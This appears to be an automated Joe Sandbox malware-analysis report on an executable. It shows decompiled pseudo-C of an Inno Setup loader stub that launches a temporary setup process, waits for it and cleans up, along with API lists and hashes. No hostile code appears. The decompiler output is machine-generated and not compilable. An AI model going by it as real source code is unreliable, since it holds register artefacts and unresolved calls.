0x00409459
0x00409462
0x00409471
0x00409476
0x00409480
0x00409484
0x00409485
0x00409487
0x00409489
0x0040948b
0x0040948d
0x0040948f
0x00409494
0x00409499
0x0040949a
0x0040949c
0x004094a1
0x004094a3
0x004094a7
0x004094a7
0x004094b0
0x00000000
0x004094c3
0x004094b8
0x004094be
0x004094be
0x004094ea
0x00000000
0x00000000
0x004094f4
0x004094fd
0x00409504
0x00409507
0x0040950a
0x00409517

APIs

6D747180.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,0040953C,020A0EF8,00409530,00000000,00409518), ref: 0040949C
CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,0040953C,020A0EF8,00409530,00000000), ref: 004094B0
TranslateMessage.USER32(?), ref: 004094B8
DispatchMessageA.USER32 ref: 004094BE
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004094CC
MsgWaitForMultipleObjects.USER32 ref: 004094E4
GetExitCodeProcess.KERNEL32 ref: 004094F4
CloseHandle.KERNEL32(?,?,?,00000001,?,00000000,000000FF,000000FF,?,00000000,00000000,00000000,00000001,?,?,00000000), ref: 004094FD

Part of subcall function 00409074: GetLastError.KERNEL32(00000000,00409117,?,?,020A0EF8,?), ref: 00409098

Strings

D, xrefs: 00409476

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Message$CloseHandle$CodeD747180DispatchErrorExitLastMultipleObjectsPeekProcessTranslateWait
String ID: D
API String ID: 1312059435-2746444292
Opcode ID: 541e622093a4bd077440b65d585bc48048343c91443cc23aaac708844e5c3a71
Instruction ID: 165020aee64a3a41629bef3a081bcf9c3ca27071ff5627924b238e814c175051
Opcode Fuzzy Hash: 541e622093a4bd077440b65d585bc48048343c91443cc23aaac708844e5c3a71
Instruction Fuzzy Hash: 7121A4B1A442087ADB10EBE6CC42F9E77AC9F48714F50413AB714F61C2DA7C9A018A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00409B76 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E00409B76(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				struct HINSTANCE__* _t31;
				struct HWND__* _t32;
				struct HWND__* _t33;
				struct HWND__* _t36;
				intOrPtr _t43;
				intOrPtr _t44;
				void* _t47;
				void* _t52;
				intOrPtr _t54;
				intOrPtr _t57;
				int _t58;
				intOrPtr _t59;
				intOrPtr _t61;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t74;
				intOrPtr _t78;
				intOrPtr _t83;
				void* _t89;

				_t87 = __esi;
				_t86 = __edi;
				_t67 = __ebx;
				 *((intOrPtr*)(__esi - 0x65)) =  *((intOrPtr*)(__esi - 0x65)) + __ebx;
				 *((intOrPtr*)(__ebx - 0x17aff3c0)) =  *((intOrPtr*)(__ebx - 0x17aff3c0)) + __ecx;
				_pop(_t89);
				_t91 = __eax + 0x73 & 0x61b0ffff;
				E00409074(__eax + 0x73, __ebx, __ecx, __edi, __esi, __eax + 0x73 & 0x61b0ffff);
				E00402F24();
				E00406DD4(0x40bdd8);
				_t31 =  *0x40b014; // 0x400000
				_t32 = CreateWindowExA(0, "STATIC", "InnoSetupLdrWindow", 0, 0, 0, 0, 0, 0, 0, _t31, 0); // executed
				 *0x40a240 = _t32;
				_t33 =  *0x40a240; // 0x40228
				 *0x40bdd0 = SetWindowLongA(_t33, 0xfffffffc, E00409394);
				_t36 =  *0x40a240; // 0x40228
				 *(_t89 - 0x18) = _t36;
				 *((char*)(_t89 - 0x14)) = 0;
				E00405150("/SL4 $%x \"", 0, _t89 - 0x18, _t89 - 0x10);
				_t78 =  *0x40bdd4; // 0x20a03cc
				E004032FC(_t89 - 0x10, _t78);
				_push(_t89 - 0x10);
				_t43 =  *0x40be08; // 0x131e60
				 *((intOrPtr*)(_t89 - 0x2c)) = _t43;
				 *((char*)(_t89 - 0x28)) = 0;
				_t44 =  *0x40be0c; // 0xca00
				 *((intOrPtr*)(_t89 - 0x24)) = _t44;
				 *((char*)(_t89 - 0x20)) = 0;
				E00405150("\" %d %d ", 1, _t89 - 0x2c, _t89 - 0x1c);
				_pop(_t47);
				E004032FC(_t47,  *((intOrPtr*)(_t89 - 0x1c)));
				_push(_t89 - 0x10);
				E004068F8(_t89 - 0x1c);
				_pop(_t52);
				E004032FC(_t52,  *((intOrPtr*)(_t89 - 0x1c)));
				_t54 =  *0x40be18; // 0x20a0ef8, executed
				E00409428(_t54, __ebx, 0x40a23c,  *((intOrPtr*)(_t89 - 0x10)), __edi, __esi, _t91); // executed
				_pop(_t83);
				 *[fs:eax] = _t83;
				_push(E00409D0F);
				_t57 =  *0x40bdd8; // 0x0
				_t58 = E00402924(_t57);
				if( *0x40be18 != 0) {
					_t66 =  *0x40be18; // 0x20a0ef8, executed
					_t58 = E0040900C(_t66, 0xd, 0xfa); // executed
				}
				if( *0x40be14 != 0) {
					_t64 =  *0x40be14; // 0x20a0e4c
					_t58 = RemoveDirectoryA(E004034B8(_t64)); // executed
				}
				if( *0x40a240 != 0) {
					_t58 =  *0x40a240; // 0x40228
					_push(_t58); // executed
					L004045A0(); // executed
				}
				if( *0x40bdc8 != 0) {
					_t59 =  *0x40bdc8; // 0x0
					_t74 =  *0x40bdcc; // 0x1
					E00403620(_t59, _t67, _t74, 0x408828, _t86, _t87);
					_t61 =  *0x40bdc8; // 0x0
					E004025AC(_t61);
					 *0x40bdc8 = 0;
					return 0;
				}
				return _t58;
			}

0x00409b76
0x00409b76
0x00409b76
0x00409b79
0x00409b7d
0x00409b83
0x00409b84
0x00409b89
0x00409b8e
0x00409b98
0x00409b9f
0x00409bbf
0x00409bc4
0x00409bd0
0x00409bdb
0x00409be4
0x00409be9
0x00409bec
0x00409bfa
0x00409c02
0x00409c08
0x00409c10
0x00409c15
0x00409c1a
0x00409c1d
0x00409c21
0x00409c26
0x00409c29
0x00409c3a
0x00409c42
0x00409c43
0x00409c4b
0x00409c4f
0x00409c57
0x00409c58
0x00409c65
0x00409c6a
0x00409c71
0x00409c74
0x00409c77
0x00409c7c
0x00409c81
0x00409c8d
0x00409c9e
0x00409ca3
0x00409ca3
0x00409caf
0x00409cb1
0x00409cbc
0x00409cbc
0x00409cc8
0x00409cca
0x00409ccf
0x00409cd0
0x00409cd0
0x00409cdc
0x00409cde
0x00409ce3
0x00409cee
0x00409cf3
0x00409cf8
0x00409cff
0x00000000
0x00409cff
0x00409d04

APIs

Part of subcall function 00409074: GetLastError.KERNEL32(00000000,00409117,?,?,020A0EF8,?), ref: 00409098

CreateWindowExA.USER32 ref: 00409BBF
SetWindowLongA.USER32 ref: 00409BD6

Part of subcall function 004068F8: GetCommandLineA.KERNEL32(0040BDE0,?,00406A3C,00000000,00406A78,?,?,0040BDE0,?,00000000,00000000,?,004091B1,00000000,0040923D), ref: 004068FC

Part of subcall function 00409428: 6D747180.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,0040953C,020A0EF8,00409530,00000000,00409518), ref: 0040949C
Part of subcall function 00409428: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,0040953C,020A0EF8,00409530,00000000), ref: 004094B0
Part of subcall function 00409428: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004094CC
Part of subcall function 00409428: MsgWaitForMultipleObjects.USER32 ref: 004094E4
Part of subcall function 00409428: GetExitCodeProcess.KERNEL32 ref: 004094F4
Part of subcall function 00409428: CloseHandle.KERNEL32(?,?,?,00000001,?,00000000,000000FF,000000FF,?,00000000,00000000,00000000,00000001,?,?,00000000), ref: 004094FD

RemoveDirectoryA.KERNEL32(00000000,00409D0F,000000FC,00409394,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00409CBC
740C9840.USER32(00040228,00409D0F,000000FC,00409394,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00409CD0

Part of subcall function 0040900C: Sleep.KERNEL32(?,?,?,?,00000032,?,00409CA8,000000FA,00409D0F,000000FC,00409394,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 0040902B
Part of subcall function 0040900C: 6D2B5F60.KERNEL32(00000000,?,?,?,00000032,?,00409CA8,000000FA,00409D0F,000000FC,00409394,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 00409048
Part of subcall function 0040900C: GetLastError.KERNEL32(00000000,?,?,?,00000032,?,00409CA8,000000FA,00409D0F,000000FC,00409394,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 00409051
Part of subcall function 0040900C: GetLastError.KERNEL32(00000000,?,?,?,00000032,?,00409CA8,000000FA,00409D0F,000000FC,00409394,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 0040905B

Strings

InnoSetupLdrWindow, xrefs: 00409BB3
/SL4 $%x ", xrefs: 00409BF5
STATIC, xrefs: 00409BB8
" %d %d , xrefs: 00409C35

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ErrorLast$CloseHandleWindow$C9840CodeCommandCreateD747180DirectoryExitLineLongMessageMultipleObjectsPeekProcessRemoveSleepWait
String ID: " %d %d $/SL4 $%x "$InnoSetupLdrWindow$STATIC
API String ID: 2754646775-4098424104
Opcode ID: 707660f298a68c925a0dde8ea74b58ad7188688c565157ce9c8db040099f3dbf
Instruction ID: 8e3adf8ed3f4642860e28b2e725b1cd2950c6588c507c52647e165c275316d40
Opcode Fuzzy Hash: 707660f298a68c925a0dde8ea74b58ad7188688c565157ce9c8db040099f3dbf
Instruction Fuzzy Hash: 25413A70A042059BD701EBA9ED46BAA77A4EF84304F24453BE210B73E2C77C98458B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00409B63 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00409B63(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t21;
				struct HWND__* _t22;
				struct HWND__* _t23;
				struct HWND__* _t26;
				intOrPtr _t33;
				intOrPtr _t34;
				void* _t37;
				void* _t42;
				intOrPtr _t44;
				intOrPtr _t47;
				int _t48;
				intOrPtr _t49;
				intOrPtr _t51;
				intOrPtr _t54;
				intOrPtr _t56;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t74;
				void* _t79;
				void* _t80;

				_t80 = __eflags;
				_t78 = __esi;
				_t77 = __edi;
				_t57 = __ebx;
				_pop(_t67);
				 *[fs:eax] = _t67;
				E00406DD4(0x40bdd8);
				_t21 =  *0x40b014; // 0x400000
				_t22 = CreateWindowExA(0, "STATIC", "InnoSetupLdrWindow", 0, 0, 0, 0, 0, 0, 0, _t21, 0); // executed
				 *0x40a240 = _t22;
				_t23 =  *0x40a240; // 0x40228
				 *0x40bdd0 = SetWindowLongA(_t23, 0xfffffffc, E00409394);
				_t26 =  *0x40a240; // 0x40228
				 *(_t79 - 0x18) = _t26;
				 *((char*)(_t79 - 0x14)) = 0;
				E00405150("/SL4 $%x \"", 0, _t79 - 0x18, _t79 - 0x10);
				_t69 =  *0x40bdd4; // 0x20a03cc
				E004032FC(_t79 - 0x10, _t69);
				_push(_t79 - 0x10);
				_t33 =  *0x40be08; // 0x131e60
				 *((intOrPtr*)(_t79 - 0x2c)) = _t33;
				 *((char*)(_t79 - 0x28)) = 0;
				_t34 =  *0x40be0c; // 0xca00
				 *((intOrPtr*)(_t79 - 0x24)) = _t34;
				 *((char*)(_t79 - 0x20)) = 0;
				E00405150("\" %d %d ", 1, _t79 - 0x2c, _t79 - 0x1c);
				_pop(_t37);
				E004032FC(_t37,  *((intOrPtr*)(_t79 - 0x1c)));
				_push(_t79 - 0x10);
				E004068F8(_t79 - 0x1c);
				_pop(_t42);
				E004032FC(_t42,  *((intOrPtr*)(_t79 - 0x1c)));
				_t44 =  *0x40be18; // 0x20a0ef8, executed
				E00409428(_t44, __ebx, 0x40a23c,  *((intOrPtr*)(_t79 - 0x10)), __edi, __esi, _t80); // executed
				_pop(_t74);
				 *[fs:eax] = _t74;
				_push(E00409D0F);
				_t47 =  *0x40bdd8; // 0x0
				_t48 = E00402924(_t47);
				if( *0x40be18 != 0) {
					_t56 =  *0x40be18; // 0x20a0ef8, executed
					_t48 = E0040900C(_t56, 0xd, 0xfa); // executed
				}
				if( *0x40be14 != 0) {
					_t54 =  *0x40be14; // 0x20a0e4c
					_t48 = RemoveDirectoryA(E004034B8(_t54)); // executed
				}
				if( *0x40a240 != 0) {
					_t48 =  *0x40a240; // 0x40228
					_push(_t48); // executed
					L004045A0(); // executed
				}
				if( *0x40bdc8 != 0) {
					_t49 =  *0x40bdc8; // 0x0
					_t65 =  *0x40bdcc; // 0x1
					E00403620(_t49, _t57, _t65, 0x408828, _t77, _t78);
					_t51 =  *0x40bdc8; // 0x0
					E004025AC(_t51);
					 *0x40bdc8 = 0;
					return 0;
				}
				return _t48;
			}

0x00409b63
0x00409b63
0x00409b63
0x00409b63
0x00409b65
0x00409b68
0x00409b98
0x00409b9f
0x00409bbf
0x00409bc4
0x00409bd0
0x00409bdb
0x00409be4
0x00409be9
0x00409bec
0x00409bfa
0x00409c02
0x00409c08
0x00409c10
0x00409c15
0x00409c1a
0x00409c1d
0x00409c21
0x00409c26
0x00409c29
0x00409c3a
0x00409c42
0x00409c43
0x00409c4b
0x00409c4f
0x00409c57
0x00409c58
0x00409c65
0x00409c6a
0x00409c71
0x00409c74
0x00409c77
0x00409c7c
0x00409c81
0x00409c8d
0x00409c9e
0x00409ca3
0x00409ca3
0x00409caf
0x00409cb1
0x00409cbc
0x00409cbc
0x00409cc8
0x00409cca
0x00409ccf
0x00409cd0
0x00409cd0
0x00409cdc
0x00409cde
0x00409ce3
0x00409cee
0x00409cf3
0x00409cf8
0x00409cff
0x00000000
0x00409cff
0x00409d04

APIs

CreateWindowExA.USER32 ref: 00409BBF
SetWindowLongA.USER32 ref: 00409BD6

Part of subcall function 004068F8: GetCommandLineA.KERNEL32(0040BDE0,?,00406A3C,00000000,00406A78,?,?,0040BDE0,?,00000000,00000000,?,004091B1,00000000,0040923D), ref: 004068FC

Part of subcall function 00409428: 6D747180.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,0040953C,020A0EF8,00409530,00000000,00409518), ref: 0040949C
Part of subcall function 00409428: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,0040953C,020A0EF8,00409530,00000000), ref: 004094B0
Part of subcall function 00409428: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004094CC
Part of subcall function 00409428: MsgWaitForMultipleObjects.USER32 ref: 004094E4
Part of subcall function 00409428: GetExitCodeProcess.KERNEL32 ref: 004094F4
Part of subcall function 00409428: CloseHandle.KERNEL32(?,?,?,00000001,?,00000000,000000FF,000000FF,?,00000000,00000000,00000000,00000001,?,?,00000000), ref: 004094FD

RemoveDirectoryA.KERNEL32(00000000,00409D0F,000000FC,00409394,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00409CBC
740C9840.USER32(00040228,00409D0F,000000FC,00409394,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00409CD0

Part of subcall function 0040900C: Sleep.KERNEL32(?,?,?,?,00000032,?,00409CA8,000000FA,00409D0F,000000FC,00409394,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 0040902B
Part of subcall function 0040900C: 6D2B5F60.KERNEL32(00000000,?,?,?,00000032,?,00409CA8,000000FA,00409D0F,000000FC,00409394,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 00409048
Part of subcall function 0040900C: GetLastError.KERNEL32(00000000,?,?,?,00000032,?,00409CA8,000000FA,00409D0F,000000FC,00409394,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 00409051
Part of subcall function 0040900C: GetLastError.KERNEL32(00000000,?,?,?,00000032,?,00409CA8,000000FA,00409D0F,000000FC,00409394,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 0040905B

Strings

InnoSetupLdrWindow, xrefs: 00409BB3
/SL4 $%x ", xrefs: 00409BF5
STATIC, xrefs: 00409BB8
" %d %d , xrefs: 00409C35

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CloseErrorHandleLastWindow$C9840CodeCommandCreateD747180DirectoryExitLineLongMessageMultipleObjectsPeekProcessRemoveSleepWait
String ID: " %d %d $/SL4 $%x "$InnoSetupLdrWindow$STATIC
API String ID: 385723691-4098424104
Opcode ID: 400fe8613ed19fa1b37da1a693d414b31754fec83bf3ed64b2fdd682156418e3
Instruction ID: 4a326fc393e1ea8ae26459022dc75ef76f7bcc14ffe701c1a522a5024f58fdd1
Opcode Fuzzy Hash: 400fe8613ed19fa1b37da1a693d414b31754fec83bf3ed64b2fdd682156418e3
Instruction Fuzzy Hash: 79411B71A042059BD701EBA9ED45BAA77B4EF88304F20443BE600B73E2D77D99458BAD

Uniqueness

Uniqueness Score: -1.00%

Function 004019DC Relevance: 9.1, APIs: 6, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E004019DC() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t18;
				intOrPtr _t22;
				intOrPtr _t24;

				_t22 = _t24;
				if( *0x40b415 == 0) {
					return _t2;
				} else {
					_push(_t22);
					_push(E00401AB4);
					_push( *[fs:edx]);
					 *[fs:edx] = _t24;
					if( *0x40b032 != 0) {
						_push(0x40b41c);
						L00401274();
					}
					 *0x40b415 = 0;
					_t3 =  *0x40b474; // 0x0
					LocalFree(_t3);
					 *0x40b474 = 0;
					_t18 =  *0x40b43c; // 0x40b43c
					while(_t18 != 0x40b43c) {
						_t1 = _t18 + 8; // 0x0
						VirtualFree( *_t1, 0, 0x8000); // executed
						_t18 =  *_t18;
					}
					E004012DC(0x40b43c);
					E004012DC(0x40b44c);
					E004012DC(0x40b478);
					_t14 =  *0x40b434; // 0x0
					while(_t14 != 0) {
						 *0x40b434 =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x40b434; // 0x0
					}
					_pop( *[fs:0x0]);
					_push(0x401abb);
					if( *0x40b032 != 0) {
						_push(0x40b41c);
						L0040127C();
					}
					_push(0x40b41c);
					L00401284();
					return _t14;
				}
			}

0x004019dd
0x004019e7
0x00401abd
0x004019ed
0x004019ef
0x004019f0
0x004019f5
0x004019f8
0x00401a02
0x00401a04
0x00401a09
0x00401a09
0x00401a0e
0x00401a15
0x00401a1b
0x00401a22
0x00401a27
0x00401a41
0x00401a36
0x00401a3a
0x00401a3f
0x00401a3f
0x00401a4e
0x00401a58
0x00401a62
0x00401a67
0x00401a6e
0x00401a72
0x00401a79
0x00401a7e
0x00401a83
0x00401a87
0x00401a91
0x00401a9d
0x00401a9f
0x00401aa4
0x00401aa4
0x00401aa9
0x00401aae
0x00401ab3
0x00401ab3

APIs

RtlEnterCriticalSection.KERNEL32(0040B41C,00000000,00401AB4), ref: 00401A09
LocalFree.KERNEL32(00000000,00000000,00401AB4), ref: 00401A1B
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401AB4), ref: 00401A3A
LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401AB4), ref: 00401A79
RtlLeaveCriticalSection.KERNEL32(0040B41C,00401ABB), ref: 00401AA4
RtlDeleteCriticalSection.KERNEL32(0040B41C,00401ABB), ref: 00401AAE

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID:
API String ID: 3782394904-0
Opcode ID: 6c76a69aab1a1f3df5ba2e12c30d7b7fa82e2f09a92a1617bef653e377a21f91
Instruction ID: b0c8d0c63b49c6aaabe66432ff64a941bd842da83dadee4e543dc85868b8677d
Opcode Fuzzy Hash: 6c76a69aab1a1f3df5ba2e12c30d7b7fa82e2f09a92a1617bef653e377a21f91
Instruction Fuzzy Hash: FD1130707823809ADB11ABA59EC6F523668D745B08F44447EF444BA3F3C77C9950CAAD

Uniqueness

Uniqueness Score: -1.00%

Function 004098DD Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 119
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E004098DD(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr _t40;
				intOrPtr _t42;
				CHAR* _t43;
				intOrPtr _t49;
				CHAR* _t50;
				void* _t56;
				intOrPtr _t57;
				void* _t59;
				intOrPtr _t61;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				char* _t79;
				void* _t80;
				void* _t81;
				void* _t82;
				char* _t83;

				_t81 = __esi;
				_t80 = __edi;
				_t56 = __ebx;
				_pop(_t69);
				_pop(_t59);
				 *[fs:eax] = _t69;
				E004092B8(_t59);
				if( *0x40a07c == 0) {
					_t49 =  *0x40ba6c; // 0x0
					_t50 = E004034B8(_t49);
					_t69 = "Win32s";
					E004089C8(0x6c, _t82 - 0x10, "Win32s");
					MessageBoxA(0, E004034B8( *((intOrPtr*)(_t82 - 0x10))), _t50, 0x10);
					E00405820();
				}
				if(( *0x40bdc0 & 0x00000001) == 0 &&  *0x40a234 == 0) {
					_t42 =  *0x40bbac; // 0x0
					_t43 = E004034B8(_t42);
					_t69 =  *0x40bca8; // 0x20b146c
					E004089C8(0x98, _t82 - 0x10, _t69);
					if(MessageBoxA(0, E004034B8( *((intOrPtr*)(_t82 - 0x10))), _t43, 0x24) != 6) {
						 *0x40a23c = 2;
						E00405820();
					}
				}
				E004026C4();
				E00408E3C(_t82 - 0x10, _t56, _t69, _t80, _t81); // executed
				E004031E8(0x40be14, _t56,  *((intOrPtr*)(_t82 - 0x10)), _t80, _t81);
				_t71 =  *0x40be14; // 0x20a0e4c
				E00408D30(0, _t56, 0x409db4, _t71, _t80, _t81, _t82 - 0x10); // executed
				E004031E8(0x40be18, _t56,  *((intOrPtr*)(_t82 - 0x10)), _t80, _t81);
				_t73 =  *0x40bdfc; // 0x134166
				E00407354(_t73);
				_push(_t82);
				_push(0x409b6d);
				_push( *[fs:edx]);
				 *[fs:edx] = _t83;
				 *0x40be5c = 0;
				_t61 =  *0x40be18; // 0x20a0ef8
				_t27 = E00407110(_t61, 1, 0, 1, 0); // executed
				 *0x40bddc = _t27;
				 *[fs:eax] = _t83;
				_t29 =  *0x40be00; // 0xa0e00
				 *0x40be5c = E00402594(_t29,  *[fs:eax], 0x409b5c, _t82);
				_t57 =  *0x40be5c; // 0x20b8000
				_t76 =  *0x40be00; // 0xa0e00
				E0040277C(_t57, _t76);
				_push(_t82);
				_push(0x409ab8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83;
				_t63 =  *0x40bdd8; // 0x0
				_t35 = E004076B4(_t63, 1, "tv@"); // executed
				 *0x40be60 = _t35;
				_push(_t82);
				_push(0x409aa7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83;
				_t64 =  *0x40be00; // 0xa0e00
				_t37 =  *0x40be60; // 0x2158e04
				E00407944(_t37, _t64, _t57);
				_pop(_t79);
				 *[fs:eax] = _t79;
				_push(E00409AAE);
				_t40 =  *0x40be60; // 0x2158e04
				return E00402924(_t40);
			}

0x004098dd
0x004098dd
0x004098dd
0x004098df
0x004098e1
0x004098e2
0x00409902
0x0040990e
0x00409912
0x00409917
0x00409920
0x00409927
0x00409937
0x0040993c
0x0040993c
0x00409948
0x00409955
0x0040995a
0x00409963
0x0040996b
0x00409983
0x00409985
0x0040998f
0x0040998f
0x00409983
0x00409994
0x0040999c
0x004099a9
0x004099b7
0x004099bf
0x004099cc
0x004099d1
0x004099dc
0x004099e3
0x004099e4
0x004099e9
0x004099ec
0x004099f1
0x004099fc
0x00409a09
0x00409a0e
0x00409a1e
0x00409a21
0x00409a2b
0x00409a30
0x00409a3a
0x00409a40
0x00409a47
0x00409a48
0x00409a4d
0x00409a50
0x00409a58
0x00409a65
0x00409a6a
0x00409a71
0x00409a72
0x00409a77
0x00409a7a
0x00409a7f
0x00409a85
0x00409a8a
0x00409a91
0x00409a94
0x00409a97
0x00409a9c
0x00409aa6

APIs

MessageBoxA.USER32 ref: 00409937
MessageBoxA.USER32 ref: 0040997B

Strings

tv@, xrefs: 00409A53
.tmp, xrefs: 004099B2
Win32s, xrefs: 00409920

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Message
String ID: .tmp$Win32s$tv@
API String ID: 2030045667-1766138599
Opcode ID: 3fddd7748c1efeaef797afce712b61bc16134fe14e5f2efe0f508988652e79f3
Instruction ID: d0719c4f5a27637985a1895d137a0586122a5a3a0ae2437d375b320d73db81a5
Opcode Fuzzy Hash: 3fddd7748c1efeaef797afce712b61bc16134fe14e5f2efe0f508988652e79f3
Instruction Fuzzy Hash: 5F415B706146449FD701EB65ED52A6A77A9EB48704F10883AF900B77E2CB7D6C00CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 004098F8 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 115
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E004098F8(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr _t40;
				intOrPtr _t42;
				CHAR* _t43;
				intOrPtr _t49;
				CHAR* _t50;
				void* _t56;
				intOrPtr _t57;
				void* _t58;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t70;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t78;
				void* _t79;
				void* _t80;
				void* _t81;
				intOrPtr _t82;

				_t80 = __esi;
				_t79 = __edi;
				_t58 = __ecx;
				_t56 = __ebx;
				E00409540();
				E00402F24();
				E004092B8(_t58);
				if( *0x40a07c == 0) {
					_t49 =  *0x40ba6c; // 0x0
					_t50 = E004034B8(_t49);
					_t68 = "Win32s";
					E004089C8(0x6c, _t81 - 0x10, "Win32s");
					MessageBoxA(0, E004034B8( *((intOrPtr*)(_t81 - 0x10))), _t50, 0x10);
					E00405820();
				}
				if(( *0x40bdc0 & 0x00000001) == 0 &&  *0x40a234 == 0) {
					_t42 =  *0x40bbac; // 0x0
					_t43 = E004034B8(_t42);
					_t68 =  *0x40bca8; // 0x20b146c
					E004089C8(0x98, _t81 - 0x10, _t68);
					if(MessageBoxA(0, E004034B8( *((intOrPtr*)(_t81 - 0x10))), _t43, 0x24) != 6) {
						 *0x40a23c = 2;
						E00405820();
					}
				}
				E004026C4();
				E00408E3C(_t81 - 0x10, _t56, _t68, _t79, _t80); // executed
